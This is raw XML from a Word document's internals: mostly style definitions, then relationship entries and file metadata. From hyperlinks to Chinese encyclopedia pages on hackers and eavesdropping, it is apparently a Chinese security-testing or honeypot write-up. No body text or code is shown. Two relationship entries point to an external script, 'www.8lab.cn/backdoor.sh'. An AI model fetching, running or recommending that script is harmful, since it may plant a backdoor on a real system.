  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f0">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="5"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2100"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2100" w:hanging="420"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="楷体_GB2312"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff1">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="af8"/>
    <w:link w:val="Chard"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="312" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chard">
    <w:name w:val="副标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="25">
    <w:name w:val="样式2"/>
    <w:basedOn w:val="aff1"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="425"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f1">
    <w:name w:val="测试 1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="425"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="测试过程"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:spacing w:before="60" w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="插图"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="插表"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f2">
    <w:name w:val="列表项目符号1"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="510">
    <w:name w:val="列表项目符号 51"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="320" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond"/>
      <w:kern w:val="1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="样式3"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="780"/>
      </w:tabs>
      <w:ind w:left="-420" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f3">
    <w:name w:val="列表编号1"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="240" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:right="720" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:spacing w:val="0"/>
      <w:lang w:eastAsia="he-IL" w:bidi="he-IL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="项目符号"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="156" w:after="156" w:line="0" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl24">
    <w:name w:val="xl24"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="0000FF"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:kern w:val="1"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl25">
    <w:name w:val="xl25"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text">
    <w:name w:val="Text"/>
    <w:basedOn w:val="Caption1"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="WW-Text">
    <w:name w:val="WW-Text"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="260" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Label">
    <w:name w:val="Label"/>
    <w:basedOn w:val="WW-Text"/>
    <w:next w:val="WW-Text"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="210">
    <w:name w:val="正文文本缩进 21"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:left="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="075">
    <w:name w:val="样式 宋体 首行缩进:  0.75 厘米"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="425"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="310">
    <w:name w:val="正文文本缩进 31"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="074">
    <w:name w:val="样式 首行缩进:  0.74 厘米"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DocStatistic">
    <w:name w:val="DocStatistic"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>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f8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="样式4"/>
    <w:basedOn w:val="5"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1080"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="372" w:lineRule="auto"/>
      <w:ind w:left="1080" w:hanging="1080"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Framecontents">
    <w:name w:val="Frame contents"/>
    <w:basedOn w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="TableContents"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents10">
    <w:name w:val="Contents 10"/>
    <w:basedOn w:val="Index"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9637"/>
      </w:tabs>
      <w:ind w:left="2547"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="文档结构图2"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff6">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Chare"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Courier New"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chare">
    <w:name w:val="纯文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff6"/>
    <w:rsid w:val="00C55A9C"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f4">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff7">
    <w:name w:val="表格"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="_Style 1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style13">
    <w:name w:val="_Style 13"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="_Style 2"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="1f5">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="003826B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s://baike.baidu.com/item/%E9%BB%91%E5%AE%A2/118396" TargetMode="External"/><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5.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.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7.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E7%AA%83%E5%90%AC/1624599" TargetMode="External"/><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hyperlink" Target="https://baike.baidu.com/item/Deepin" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.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6.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0.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hyperlink" Target="https://baike.baidu.com/item/Deepin" TargetMode="Externa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hyperlink" Target="http://www.8lab.cn/backdoor.sh" TargetMode="External"/><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0.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hyperlink" Target="https://baike.baidu.com/item/%E8%9C%9C/79956" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.8lab.cn/backdoor.sh" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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109.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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A56310-AACB-4CCF-913D-4F3FE04B1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98</Pages>
  <Words>4540</Words>
  <Characters>25881</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>215</Lines>
  <Paragraphs>60</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>30361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Windows 用户</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-01T02:44:00Z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